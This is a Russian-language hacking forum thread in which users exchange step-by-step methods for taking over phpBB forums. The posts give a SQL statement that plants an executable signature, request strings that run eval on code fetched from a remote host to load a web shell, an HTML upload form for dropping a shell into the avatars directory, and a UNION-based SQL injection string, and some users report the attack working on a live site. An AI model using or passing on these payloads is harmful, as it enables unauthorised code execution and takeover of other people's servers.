Ваши вопросы по уязвимостям.

Konqi можно через картинку, но не всегда это работает!
а можно через восстановление БД:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
а потом в командной строке в профайле
&cmd=phpinfo();
или
cmd=eval(file_get_contents('http://ххх.ru/down/shell.txt'));

 

https://forum.antichat.ru/showpost.php?p=198446&postcount=3

 

2 GOGA075

и где ставить этот sql запрос?

 

Создаешь файл 1.sql пихеш туда этот запрос, топаешь а админку и восстанавливаешь его там!
потом топаешь в профайл и ...
profile.php?mode=editprofile&cmd=phpinfo();
видешь phpinf'у!
ну а дальше шел...

 

Делаешь бекап базы,в файл это записываешь,и делаешь восстановление базы,ну или как-то так.

 

ok люди Щас папробую ))

 

парни сработал спасибо вам

 

phpinfo пашет а вот с шелом никак

Parse error: syntax error, unexpected '<' in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code(1) : assert code(1) : eval()'d code on line 1

Warning: assert() [function.assert]: Assertion "eval(file_get_contents('http://mysite.com/shell.php'));" failed in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code on line 1

 

Konqi расширение шела не php а txt и только txt!

eval(file_get_contents('http://mysite.com/shell.txt'));

 

А аплоадить шелл некак?
5 сек дам линк на пост )

https://forum.antichat.ru/showpost.php?p=1722124&postcount=10463

 

как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
eval(file_get_contents($_GET['e']));
а потом обращаться
http://site.com/images/sh.php?e=http://адресс_до_шела

З.Ы или как Ctacok посоветовал, это проще)

 

И как же этот код на сервер запихнуть?

 

GOGA075

с текстом тоже самое

 

Ну тут 2 варианта.
Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!

 

я ни так хорошо понял версию Ctacok

куда нужно ставить эту форму аплоада ??

 

Konqi попробуй через иклуид!

 

GOGA075 ты Эйнштейн.

как можно было забыть такое!!

shell загрузилось без каких либо проблем

 

1. создаёшь у себя на компе 1.html
2. засовываешь туда

HTML:

      <form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
     

3. создаёшь 1.sql
4. суёшь туда

PHP:

      UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME';
    

5. открываешь через браузер 1.html
6. выбираешь шелл
7. жмёшь upload
8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php

так ясно? %)

 

А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!

 

Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on

?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user--

выводится 2 и 8. file_priv = Y

Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается